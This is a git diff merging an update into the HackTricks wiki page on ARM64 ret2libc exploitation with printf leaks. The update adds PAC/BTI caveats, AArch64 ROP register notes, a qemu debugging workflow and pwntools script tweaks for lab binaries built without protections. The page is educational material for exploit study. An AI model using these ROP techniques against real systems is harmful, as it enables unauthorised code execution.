Merge pull request #2139 from HackTricks-wiki/research_update_src_binary-exploitation_rop-return-oriented-programing_ret2lib_ret2lib-printf-leak-arm64_20260417_032222

carlospolop · web-flow · commit 24a9ed884087 · 2026-04-17T05:29:49.000+02:00
Research Update Enhanced src/binary-exploitation/rop-return-...
diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-printf-leak-arm64.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-printf-leak-arm64.md
@@ -21,14 +21,32 @@ void main()
 }
 ```
 
-Compile without canary:
+Compile without canary and without AArch64 branch protection:
 
 ```bash
-clang -o rop-no-aslr rop-no-aslr.c -fno-stack-protector
+clang -o rop-no-aslr rop-no-aslr.c -fno-stack-protector -mbranch-protection=none
 # Disable aslr
 echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
 ```
 
+- Recent toolchains may emit **PAC/BTI** instrumentation by default on some ARM64 targets. If you are building a lab binary for practice, **`-mbranch-protection=none`** keeps the classic ret2lib flow reproducible.
+- You can quickly verify whether the binary carries branch-protection notes with:
+
+```bash
+readelf --notes -W rop-no-aslr | grep -E 'AARCH64_FEATURE_1_(BTI|PAC)'
+objdump -d rop-no-aslr | grep -E 'bti|paci|auti'
+```
+
+> [!WARNING]
+> If the target was compiled with return-address signing (`pac-ret` / `standard`) a naive overwrite of the saved **`x30`** may fail during the function epilogue. In real targets, confirm first whether PAC/BTI is present before assuming a vanilla ROP chain will work.
+
+### AArch64 ROP reminders
+
+- **`x0`** to **`x7`** hold the first 8 function arguments, so a ret2libc chain must place the pointer to **`/bin/sh`** in **`x0`** before branching to **`system`**.
+- **`ret`** jumps to the address stored in **`x30`**. In practice, the saved return address is usually restored by an epilogue such as **`ldp x29, x30, [sp], #0x10; ret;`**.
+- Keep **`sp` 16-byte aligned** at function boundaries. Misaligned stacks can crash in epilogues or inside libc before the chain reaches **`system`**.
+- On AArch64, very useful gadgets often look like **`ldr x0, [sp, #imm]; ldp x29, x30, [sp], #off; ret;`** because they both set the first argument and advance the ROP chain.
+
 ### Find offset - x30 offset
 
 Creating a pattern with **`pattern create 200`**, using it, and checking for the offset with **`pattern search $x30`** we can see that the offset is **`108`** (0x6c).
@@ -49,7 +67,7 @@ As the ASLR is disabled, the addresses are going to be always the same:
 
 We need to have in **`x0`** the address to the string **`/bin/sh`** and call **`system`**.
 
-Using rooper an interesting gadget was found:
+Using ropper an interesting gadget was found:
 
 ```
 0x000000000006bdf0: ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret;
@@ -63,6 +81,7 @@ This gadget will load `x0` from **`$sp + 0x18`** and then load the addresses x29
 from pwn import *
 from time import sleep
 
+context.arch = 'aarch64'
 p = process('./rop')  # For local binary
 libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")
 libc.address = 0x0000fffff7df0000
@@ -89,6 +108,15 @@ p.interactive()
 p.close()
 ```
 
+> [!TIP]
+> If you are exploiting/debugging an ARM64 binary from an x86_64 workstation, a quick local workflow is:
+>
+> ```bash
+> qemu-aarch64 -L /usr/aarch64-linux-gnu ./rop-no-aslr
+> qemu-aarch64 -g 1234 -L /usr/aarch64-linux-gnu ./rop-no-aslr
+> gdb-multiarch ./rop-no-aslr -ex 'target remote :1234'
+> ```
+
 ## Ret2lib - NX, ASL & PIE bypass with printf leaks from the stack
 
 ```c
@@ -120,7 +148,7 @@ void main()
 Compile **without canary**:
 
 ```bash
-clang -o rop rop.c -fno-stack-protector -Wno-format-security
+clang -o rop rop.c -fno-stack-protector -Wno-format-security -mbranch-protection=none
 ```
 
 ### PIE and ASLR but no canary
@@ -144,6 +172,9 @@ Trying different offsets, the **`%21$p`** can leak a binary address (PIE bypass)
 
 Subtracting the libc leaked address with the base address of libc, it's possible to see that the **offset** of the **leaked address from the base is `0x49c40`.**
 
+> [!IMPORTANT]
+> The exact format-string positions are **build-dependent**. The values **`%21$p`** and **`%25$p`** are valid for this binary/libc combination, but different compilers, optimization levels or libc versions can move the interesting pointers. On AArch64 this is especially visible because **`printf`** receives its first arguments in registers first, and only later consumes stack values. In a new target, brute-force several **`%p`** positions or inspect the state right before the **`printf`** call to re-discover the correct offsets.
+
 ### x30 offset
 
 See the previous example as the bof is the same.
@@ -152,7 +183,7 @@ See the previous example as the bof is the same.
 
 Like in the previous example, we need to have in **`x0`** the address to the string **`/bin/sh`** and call **`system`**.
 
-Using rooper another interesting gadget was found:
+Using ropper another interesting gadget was found:
 
 ```
 0x0000000000049c40: ldr x0, [sp, #0x78]; ldp x29, x30, [sp], #0xc0; ret;
@@ -166,6 +197,7 @@ This gadget will load `x0` from **`$sp + 0x78`** and then load the addresses x29
 from pwn import *
 from time import sleep
 
+context.arch = 'aarch64'
 p = process('./rop')  # For local binary
 libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")
 
@@ -212,7 +244,10 @@ p.sendline(payload)
 p.interactive()
 ```
 
-{{#include ../../../banners/hacktricks-training.md}}
 
 
+## References
 
+- [ARM64 Reversing And Exploitation Part 7 – Bypassing ASLR and NX - 8kSec](https://8ksec.io/arm64-reversing-and-exploitation-part-7-bypassing-aslr-and-nx/)
+- [AArch64 Options - GCC documentation](https://gcc.gnu.org/onlinedocs/gcc/AArch64-Options.html)
+{{#include ../../../banners/hacktricks-training.md}}
